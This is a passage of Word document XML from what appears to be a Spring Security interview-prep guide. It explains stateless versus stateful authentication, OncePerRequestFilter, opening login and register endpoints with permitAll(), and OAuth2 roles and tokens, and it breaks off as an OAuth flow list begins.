        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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alidate the token and set the authentication in SecurityContextHolder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA17054" w14:textId="0AA57FB4" w:rsidR="001F3B1B" w:rsidRPr="00CE4B95" w:rsidRDefault="001F3B1B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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teless session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B42BEA3" w14:textId="2B43C0BD" w:rsidR="001F3B1B" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="001E1C2A">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DBDF3ED">
          <v:rect id="_x0000_i2154" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6366E5" w14:textId="1D1413C2" w:rsidR="001E1C2A" w:rsidRPr="00CE4B95" w:rsidRDefault="0088108E" w:rsidP="001E1C2A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="470" w:name="_Toc196307950"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the difference between stateless and stateful authentication</w:t>
      </w:r>
      <w:r w:rsidR="001E1C2A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="470"/>
    </w:p>
    <w:p w14:paraId="596F3475" w14:textId="46DA5397" w:rsidR="001E1C2A" w:rsidRPr="00CE4B95" w:rsidRDefault="001E1C2A" w:rsidP="001E1C2A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="593A62B3" w14:textId="1EF34BDE" w:rsidR="0088108E" w:rsidRPr="00CE4B95" w:rsidRDefault="0088108E" w:rsidP="0088108E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>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1"/>
        <w:gridCol w:w="3771"/>
      </w:tblGrid>
      <w:tr w:rsidR="0088108E" w:rsidRPr="00CE4B95" w14:paraId="5EA6DA9F" w14:textId="77777777" w:rsidTr="0088108E">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2FE954F4" w14:textId="77777777" w:rsidR="0088108E" w:rsidRPr="00CE4B95" w:rsidRDefault="0088108E" w:rsidP="0088108E">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ype</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="256CEC02" w14:textId="77777777" w:rsidR="0088108E" w:rsidRPr="00CE4B95" w:rsidRDefault="0088108E" w:rsidP="0088108E">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88108E" w:rsidRPr="00CE4B95" w14:paraId="3C5ABAF1" w14:textId="77777777" w:rsidTr="0088108E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="421DF40E" w14:textId="77777777" w:rsidR="0088108E" w:rsidRPr="00CE4B95" w:rsidRDefault="0088108E" w:rsidP="0088108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teful</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1228A550" w14:textId="77777777" w:rsidR="0088108E" w:rsidRPr="00CE4B95" w:rsidRDefault="0088108E" w:rsidP="0088108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ssion is stored in server memory</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0088108E" w:rsidRPr="00CE4B95" w14:paraId="4CF26808" w14:textId="77777777" w:rsidTr="0088108E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FC270F6" w14:textId="77777777" w:rsidR="0088108E" w:rsidRPr="00CE4B95" w:rsidRDefault="0088108E" w:rsidP="0088108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teless</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61747D29" w14:textId="77777777" w:rsidR="0088108E" w:rsidRPr="00CE4B95" w:rsidRDefault="0088108E" w:rsidP="0088108E">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oken (e.g., JWT) sent with every request</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5DB9972E" w14:textId="739CB0C9" w:rsidR="0088108E" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D40DC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1FBCAB7">
          <v:rect id="_x0000_i2155" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEEC861" w14:textId="30FFCC2E" w:rsidR="001E1C2A" w:rsidRPr="00CE4B95" w:rsidRDefault="003202E7" w:rsidP="001E1C2A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="471" w:name="_Toc196307951"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is OncePerRequestFilter</w:t>
      </w:r>
      <w:r w:rsidR="001E1C2A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="471"/>
    </w:p>
    <w:p w14:paraId="33A70F30" w14:textId="341E69A4" w:rsidR="003202E7" w:rsidRPr="00CE4B95" w:rsidRDefault="003202E7" w:rsidP="002967C2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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base class for filters that should be </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>invoked only once per request</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, often used for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12482023" w14:textId="77777777" w:rsidR="003202E7" w:rsidRPr="00CE4B95" w:rsidRDefault="003202E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>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gging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147A756D" w14:textId="77777777" w:rsidR="003202E7" w:rsidRPr="00CE4B95" w:rsidRDefault="003202E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>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WT validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F24716E" w14:textId="3BED2A3F" w:rsidR="003202E7" w:rsidRPr="00CE4B95" w:rsidRDefault="003202E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>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ustom security filters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D440609" w14:textId="1B5A9534" w:rsidR="001E1C2A" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="001E1C2A">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C964179">
          <v:rect id="_x0000_i2156" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A87CE8" w14:textId="07F66C1D" w:rsidR="001E1C2A" w:rsidRPr="00CE4B95" w:rsidRDefault="00AD73F9" w:rsidP="001E1C2A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="472" w:name="_Toc196307952"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to exclude certain endpoints (like /login, /register) from Spring Security</w:t>
      </w:r>
      <w:r w:rsidR="001E1C2A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="472"/>
    </w:p>
    <w:p w14:paraId="0BCCB104" w14:textId="2337DC17" w:rsidR="001E1C2A" w:rsidRPr="00CE4B95" w:rsidRDefault="001E1C2A" w:rsidP="001E1C2A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="343DD631" w14:textId="457647D9" w:rsidR="00AD73F9" w:rsidRPr="00CE4B95" w:rsidRDefault="00AD73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1927905"/>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ntMatchers</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logi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regis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ermitAll</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46AFAD09" w14:textId="46E2FF52" w:rsidR="001E1C2A" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="001E1C2A">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98F3B4E">
          <v:rect id="_x0000_i2157" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8E1027" w14:textId="2777166A" w:rsidR="001E1C2A" w:rsidRPr="00CE4B95" w:rsidRDefault="003D3A9B" w:rsidP="001E1C2A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="473" w:name="_Toc196307953"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is OAuth2 and how is it supported in Spring Security</w:t>
      </w:r>
      <w:r w:rsidR="001E1C2A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="473"/>
    </w:p>
    <w:p w14:paraId="7CCFD9AA" w14:textId="7CD153D3" w:rsidR="003D3A9B" w:rsidRPr="00CE4B95" w:rsidRDefault="003D3A9B" w:rsidP="003D3A9B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">OAuth2 is an </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>authorization framework</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for token-based access delegation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDE5361" w14:textId="77777777" w:rsidR="003D3A9B" w:rsidRPr="00CE4B95" w:rsidRDefault="003D3A9B" w:rsidP="00877C86">
      <w:pPr>
        <w:ind w:firstLine="360"/>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Security provides:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B845BD" w14:textId="77777777" w:rsidR="003D3A9B" w:rsidRPr="00CE4B95" w:rsidRDefault="003D3A9B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>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security-oauth2-client for login with Google, GitHub, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7276514F" w14:textId="0112FE73" w:rsidR="003D3A9B" w:rsidRPr="00CE4B95" w:rsidRDefault="003D3A9B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58"/>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security-oauth2-resource-server for JWT token validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8AF67B" w14:textId="04A760A3" w:rsidR="009F301D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="789EF199">
          <v:rect id="_x0000_i2158" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3EA4F2" w14:textId="135C8E5B" w:rsidR="00844F85" w:rsidRPr="00CE4B95" w:rsidRDefault="00844F85" w:rsidP="00844F85">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="474" w:name="_Toc196307954"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain OAuth in detail in Spring Boot?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="474"/>
    </w:p>
    <w:p w14:paraId="2176CAAB" w14:textId="27329A10" w:rsidR="00F7342F" w:rsidRPr="00CE4B95" w:rsidRDefault="00F7342F" w:rsidP="006060EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OAuth</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Open Authorization) is an open standard for access delegation, commonly used to grant third-party applications limited access to HTTP services, without exposing user credentials. It allows users to grant access to their resources on one website to another website, without sharing their login credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6549BF7C" w14:textId="77777777" w:rsidR="00F7342F" w:rsidRPr="00CE4B95" w:rsidRDefault="00F7342F" w:rsidP="00F7342F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key Concepts in OAuth:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5943EF2E" w14:textId="77777777" w:rsidR="00F7342F" w:rsidRPr="00CE4B95" w:rsidRDefault="00F7342F" w:rsidP="00F7342F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1960"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Authorization Server</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>: This is the server responsible for authenticating users and issuing access tokens after successful authentication. It also validates the access token and grants or denies access based on it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3BB093" w14:textId="77777777" w:rsidR="00F7342F" w:rsidRPr="00CE4B95" w:rsidRDefault="00F7342F" w:rsidP="00F7342F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1960"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Resource Server</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>: This is the server hosting the user’s data or resources. It validates the access token to allow or deny access to the requested resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F1AA5A" w14:textId="77777777" w:rsidR="00F7342F" w:rsidRPr="00CE4B95" w:rsidRDefault="00F7342F" w:rsidP="00F7342F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1960"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Client</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>: The client is the third-party application that seeks access to the user’s data on the resource server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C212C51" w14:textId="77777777" w:rsidR="00F7342F" w:rsidRPr="00CE4B95" w:rsidRDefault="00F7342F" w:rsidP="00F7342F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1960"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Resource Owner</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>: Typically, the end user who owns the data or resources that the client wants to access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FADEF5F" w14:textId="77777777" w:rsidR="00F7342F" w:rsidRPr="00CE4B95" w:rsidRDefault="00F7342F" w:rsidP="00F7342F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1960"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Access Token</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>: A token that provides the client application with authorized access to resources on behalf of the resource owner. Access tokens are typically short-lived and used for a specific period.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC50873" w14:textId="77777777" w:rsidR="00F7342F" w:rsidRPr="00CE4B95" w:rsidRDefault="00F7342F" w:rsidP="00F7342F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1960"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Refresh Token</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>: A token that is used to obtain a new access token without requiring the user to re-authenticate. It typically has a longer expiration time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E1DDB2" w14:textId="77777777" w:rsidR="00F7342F" w:rsidRPr="00CE4B95" w:rsidRDefault="00F7342F" w:rsidP="00F7342F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OAuth Flow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F02DF2B"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OAuth provides a way for users to grant permission to a client application to access their resources without sharing their username and password. It works using the following basic steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C381E81" w14:textId="77777777" w:rsidR="00F7342F" w:rsidRPr="00CE4B95" w:rsidRDefault="00F7342F" w:rsidP="00F7342F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1961"/>
        </w:numPr>
        <w:rPr>
